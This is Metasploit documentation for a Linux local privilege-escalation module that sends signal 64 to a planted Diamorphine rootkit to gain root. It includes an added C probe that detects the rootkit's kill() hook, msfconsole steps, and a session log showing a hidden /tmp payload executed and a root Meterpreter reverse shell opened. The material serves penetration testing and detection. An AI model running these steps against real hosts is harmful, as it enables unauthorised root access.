GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md

## Vulnerable Application

Diamorphine is a Linux Kernel Module (LKM) rootkit.

This module uses the Diamorphine rootkit's privilege escalation feature: sending signal 64 elevates the privileges of arbitrary processes to UID 0 (root).

This module has been tested successfully with Diamorphine from master branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
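The module's `check` relies on the fact that, on a clean Linux kernel, signal 64 (SIGRTMAX) has the default action "terminate", whereas Diamorphine's hook consumes the signal and grants root instead of delivering it. The following host self-check is an added example (not part of the Metasploit module or of Diamorphine): it forks a child with no handler for the signal, sends the signal, and reports whether the kernel delivered it. The 2 s alarm and 1 s polling window are chosen values; the signal number defaults to the module's SIGNAL option default.

```c
#include <signal.h>
#include <stdio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define DIAMORPHINE_ELEVATE_SIGNAL 64   /* default of the module's SIGNAL option */

/* Fork a child that installs no handler for `sig`, send it `sig`, and watch
 * what the kernel does. Real-time signals such as 64 default to "terminate",
 * so on a clean kernel the child dies; a kill() hook that swallows the signal
 * (as Diamorphine's does) leaves the child alive, which is the indicator.
 * Returns 0 (delivered normally), 1 (swallowed: hook suspected), -1 (error). */
int diamorphine_signal_check(int sig)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        alarm(2);              /* self-terminate via SIGALRM if sig never arrives */
        for (;;)
            pause();
    }
    if (kill(pid, sig) != 0) { /* e.g. EINVAL: not a valid signal on this system */
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return -1;
    }
    int status;
    for (int i = 0; i < 20; i++) {             /* poll for up to ~1 s */
        pid_t r = waitpid(pid, &status, WNOHANG);
        if (r == pid)
            return (WIFSIGNALED(status) && WTERMSIG(status) == sig) ? 0 : -1;
        if (r < 0)
            return -1;
        struct timespec ts = { 0, 50 * 1000 * 1000 };
        nanosleep(&ts, NULL);
    }
    waitpid(pid, NULL, 0);     /* child survived the signal; reap it once its alarm fires */
    return 1;
}

int main(void)
{
    int rc = diamorphine_signal_check(DIAMORPHINE_ELEVATE_SIGNAL);
    puts(rc == 0 ? "signal 64 delivered normally: no kill() hook detected"
       : rc == 1 ? "signal 64 swallowed: Diamorphine-style kill() hook suspected"
                 : "probe failed");
    return rc == 0 ? 0 : 2;
}
```

Run it as an unprivileged user on the host under examination; a result of 1 warrants a full forensic review of loaded kernel modules rather than being treated as conclusive on its own.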

## Verification Steps

1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/diamorphine_rootkit_signal_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new root session

## Options

**SIGNAL**

Diamorphine elevate signal (default: 64).

## Scenarios

### Linux Mint 19 (x64)

```
msf > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
session => 1
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
[*] Executing id ...
uid=0(root) gid=0(root) groups=0(root),1001(test)
[+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Executing id ...
uid=0(root) gid=0(root) groups=0(root),1001(test)
[*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
[*] Executing /tmp/.hwL5UoDL6mfZ & echo ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.228
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.228
OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```